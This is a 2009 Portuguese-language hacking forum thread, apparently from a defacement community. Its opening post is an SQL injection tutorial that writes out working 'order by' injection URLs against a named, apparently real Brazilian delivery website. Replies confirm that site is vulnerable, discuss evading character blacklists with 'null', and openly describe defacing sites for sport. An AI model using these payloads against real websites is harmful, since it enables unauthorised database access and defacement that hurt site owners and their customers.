Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Sql Injection

Collapse
X

• Filter
  • Tempo
  • Show
Clear All
new posts

• Font Size

Tutorial Sql Injection

Muitas vezes no sql injection na hora de saber o numero de colunas/tabelas
    usando o comando order by , muitos sites você coloca order by 500
    e ele ainda nao da erro , para fazer com que ele mostra resultados verdadeiros é presciso colocar uma aspa ' no começo e --+ no final

exemplo:
    Código:
    http://www.aguanabocadelivery.com.br/produto.php?id=-340 order by 500
    No exemplo acima o site carrega normal sem erro, agora observe no exemplo abaixo voce adicionando a aspa no começo eo --+ no final o site vai dar erro
    Código:
    http://www.aguanabocadelivery.com.br/produto.php?id='-340 order by 500 --+
    no exemplo abaixo tentamos saber quantas colunas/tabelas o site tem
    Código:
    http://www.aguanabocadelivery.com.br/produto.php?id='-340 order by 11 --+ <-- sem erro
    Código:
    http://www.aguanabocadelivery.com.br/produto.php?id='-340 order by 12 --+ <-- com erro
    vejam , agora você pode executar os comandos sql

Espero que tenham entendido

Ate mais galera
    Last edited by bolinhaxp; 08-12-2009, 12:46.

• Font Size
    vlww, vou testar akii

Comment

• Font Size
      Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... order by 11 --+ <-- sem erro
      o que esse --> ' <--- ta fazendo ali ? '-340 order by 11-- ? nunca testei assim , mas CREIO que da erro !
      Nao Participa ainda ?
      * Comunidade Elite Defacer

Elite Defacer
      Hackeralp - 5ubZer0 - $cr34m()

Comment

• Font Size
        =[ DiLLuViUM ]=,

Tudo após os comentários "--" é anulado/não é válido, não se iluda com o sinal de mais (+).

Comment

• Font Size
          vc testou ?

teste sem o sinal
          Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... order by 11 --
          depoois com o sinal
          Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... order by 11 --+

esse site ta vul

Comment

• Font Size
            Aqui não consta erro algum, uma dica é quando você não quer conteúdo útilize "null" (produto.php?id=null) apenas o sinal "-" muitas vezes pode lhe confundir.

Comment

• Font Size
              Oo
              oloco mano so eu to vendo esse erro huaauh
              veja os print

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... <--erro
              Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... <--sem erro

Comment

• Font Size
                Hum .. blz ! nunca tentei desse modo .. até pq eu poupo caracteres !

apenas o sinal "-" muitas vezes pode lhe confundir.
                Nao vejo vantagem em colocar null .. eu poupo caracteres colocando apenas " - "

abraço !
                Nao Participa ainda ?

Elite Defacer

Comment

• Font Size
                  Hackeralp,

Vamos lá, vou usar o exemplo do nosso amigo do tópico, -340 (4 caracteres) e null (4 caracteres). Tô brincando

Usar "null" ou usar "-", qual diferença? Aí vai da blacklist do desenvolvedor, muitas vezes não são permitidos caracteres além de letras e números me entende?
                  Last edited by RafaelVenancio; 25-11-2009, 22:16. Motivo: Editado a pedido do M4nager

Comment

• Font Size
                    kkkkkkkkkkkkkkkkkkkkkk !
                    Cara ...

Qual a vantagem de você deletar 3 caracteres pra escrever 4 no lugar ?
                    Sendo que você pode apenas acrescentar apenas 1 caractere ...

muitas vezes não são permitidos caracteres além de letras e números me entende?
                    Muitas ? Se são muitas porque nunca aconteceu isso comigo ? humm ! devo ser um homem de sorte ..

Abraço ...
                    Nao Participa ainda ?

Elite Defacer

Comment

• Font Size
                      Pelo que entendi o que o M4nager ta dizendo é que se o desenvolvedor do site for realmente bom, ele vai bloquear tudo que é caractere "estranho"/"suspeito", se o cara se liga em deface e trata do "-", de repente o null ele não trata =D
                      sigpic
                      ALF - Animal Liberation Front
                      Junte-se a nós, seja vegetariano(a)!

Comment

• Font Size
                        Hackeralp,

Acho que isso já havia sido discutido em um tópico, seu grupo trabalha em cima de falhas e eu exploro vulnerabilidades, são coisas bem diferentes por que falhas apenas os meigos cometem, eu não vou em um site e coloco "order by" acho o número de tabeles e logo depois as colunas, quem dera que fosse assim, me diz quantas vezes você e seu grupo pegaram um site e ficaram meses estudando em cima dele para quebrar a segurança sem que seja notado?

Cyber Controller,

É mais ou menos assim a ideia, por que a palavra "null" nunca será isenta por que é composta por 4 letras, já o simbulo "-" pode sim ser digamos que ser bloqueado.

Comment

• Font Size
                          Postado Originalmente por M4nager Ver Post
                          Hackeralp,

Acho que isso já havia sido discutido em um tópico, seu grupo trabalha em cima de falhas e eu exploro vulnerabilidades, são coisas bem diferentes por que falhas apenas os meigos cometem, eu não vou em um site e coloco "order by" acho o número de tabeles e logo depois as colunas, quem dera que fosse assim, me diz quantas vezes você e seu grupo pegaram um site e ficaram meses estudando em cima dele para quebrar a segurança sem que seja notado?

Cyber Controller,

É mais ou menos assim a ideia, por que a palavra "null" nunca será isenta por que é composta por 4 letras, já o simbulo "-" pode sim ser digamos que ser bloqueado.

Pois é somos lammers o que é order by mesmo? e é verdade só trabalhamos em cima de falhas, aqui ninguem explora nada
                          <team>
                          Aqui jaz um time.

</team>

Comment

• Font Size
                            Veio , ngm aqui está te chamando pra ler suas criticas contra os defacers ...
                            Se você nao gosta, entao porque você está na área de defacer ? " existe a área de PENTEST TBM " .
                            *Pelo que eu notei , nao tem como NÃO notar , você nao gosta de defacers. Mas cada um com sua opinião...
                            Aliás , todos cometem erros , somos humanos ! NÃO SOMOS PERFEITOS !
                            Alguns de nossos membros do grupo , programam em PHP "trabalham com isso" , outros programam em delphi ,
                            *, C , perl , outro estuda hacking , engenharia sociall , vulnerabilidade em aplicaçoes web , pentest "defacer" etc ...
                            Alguns trabalham consertando vulnerabilidades para administradores ... entao meu amigo , cada 1 com sua area... O que eu quiz dizer que o grupo faz deface por esporte , mas estudam diversas areas .. e order by , union , select , from etc ..
                            *FAZ PARTE DE UM DEFACE , sendo sql injection ... Exploramos varios tipos de falhas , alguns de nos trabalhamos com isso !
                            Entao , nao quero ser chato mas , se voce tem algo contra defacer .. melhor nao entrar aqui !

EXPLORAMOS E TRABALHAMOS EM CIMAS DAS VULNERABILIDADES !

Entao para com esse mimimi =) ok ? abraço!

Sem mais cometários .
                            Last edited by Maikel; 26-11-2009, 06:04.
                            Nao Participa ainda ?

Elite Defacer

Comment

• Font Size
                              Mimimi? Não estou pouco interessado de como seu grupo age e o que faz, apenas estou rebatendo o post onde você me crítico pelo maneira de utilizar o "null".

Comment

X
                              Working...
                              X